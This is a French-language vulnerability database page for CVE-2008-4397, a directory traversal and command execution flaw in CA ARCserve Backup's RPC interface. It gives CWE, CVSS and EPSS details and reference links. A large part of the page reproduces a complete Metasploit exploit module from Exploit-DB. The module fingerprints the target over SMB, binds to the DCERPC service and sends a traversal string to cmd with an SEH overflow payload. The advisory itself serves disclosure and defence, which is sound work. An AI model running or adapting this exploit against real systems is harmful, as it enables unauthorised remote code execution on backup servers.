CVE-2008-4397 : Détail

CVE-2008-4397

Directory Traversal
A03-InjectionA01-Broken Access Control
85.82%V4
Network
2008-10-14
18h00 +00:00
2018-10-11
17h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Directory traversal vulnerability in the RPC interface (asdbapi.dll) in CA ARCserve Backup (formerly BrightStor ARCserve Backup) r11.1 through r12.0 allows remote attackers to execute arbitrary commands via a .. (dot dot) in an RPC call with opnum 0x10A.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 16404

Date de publication : 2010-04-29 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # $Id: ca_arcserve_342.rb 9179 2010-04-30 08:40:19Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in Computer Associates BrighStor ARCserve r11.5 (build 3884). By sending a specially crafted RPC request to opcode 0x342, an attacker could overflow the buffer and execute arbitrary code. In order to successfully exploit this vulnerability, you will need set the hostname argument (HNAME). }, 'Author' => [ 'Nahuel Cayento Riva', 'MC' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9179 $', 'References' => [ [ 'BID', '31684' ], [ 'OSVDB', '49468' ], [ 'CVE', '2008-4397' ], [ 'URL', 'http://crackinglandia.blogspot.com/2009/10/el-colador-de-ca-computer-associates.html' ], ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 550, 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e", 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', 'Targets' => [ [ 'Computer Associates BrighStor ARCserve r11.5 (build 3884)', { 'Ret' => 0x2123bdf4 } ], # ASCORE.dll 11.5.3884.0 ], 'DisclosureDate' => 'Oct 9 2008', 'DefaultTarget' => 0)) register_options( [ OptString.new('HNAME', [ true, 'The NetBios hostname of the target.']), Opt::RPORT(6504) ], self.class) end def fingerprint datastore['RPORT'] = 445 os = smb_fingerprint() return os end def exploit path = fingerprint() if ( path['os'] =~ /Windows 2000/ ) dir = "winnt" offset = 442 elsif ( path['os'] =~ /Windows XP/ ) dir = "windows" offset = 436 else print_error("Target not supported!") return end print_status("Identified OS '#{path['os']}', setting appropiate system path...") datastore['RPORT'] = 6504 connect() handle = dcerpc_handle('506b1890-14c8-11d1-bbc3-00805fa6962e', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") buffer = rand_text_alpha_upper(offset) + generate_seh_payload(target.ret) sploit = NDR.string("#{datastore['HNAME'].upcase}") sploit << NDR.string("..\\..\\..\\..\\..\\..\\..\\..\\..\\#{dir}\\system32\\cmd /c \"""\"""") sploit << NDR.string(buffer) sploit << NDR.string(rand_text_alpha_upper(20)) sploit << NDR.long(2) sploit << NDR.long(2) sploit << NDR.string(rand_text_alpha_upper(20)) sploit << NDR.long(0) sploit << NDR.long(4) print_status("Trying target #{target.name}...") begin dcerpc_call(342, sploit) rescue Rex::Proto::DCERPC::Exceptions::NoResponse end handler disconnect end end

Products Mentioned

Configuraton 0

Broadcom>>Arcserve_backup >> Version r12.0

Broadcom>>Business_protection_suite >> Version r2

Broadcom>>Server_protection_suite >> Version r2

Ca>>Arcserve_backup >> Version r11.1

    Ca>>Arcserve_backup >> Version r11.5

      Ca>>Business_protection_suite >> Version r2

        Ca>>Business_protection_suite >> Version r2

          Références

          http://www.securityfocus.com/bid/31684
          Tags : vdb-entry, x_refsource_BID
          http://www.vupen.com/english/advisories/2008/2777
          Tags : vdb-entry, x_refsource_VUPEN
          http://www.securitytracker.com/id?1021032
          Tags : vdb-entry, x_refsource_SECTRACK
          http://secunia.com/advisories/32220
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://www.securityfocus.com/archive/1/497218
          Tags : mailing-list, x_refsource_BUGTRAQ
          http://securityreason.com/securityalert/4412
          Tags : third-party-advisory, x_refsource_SREASON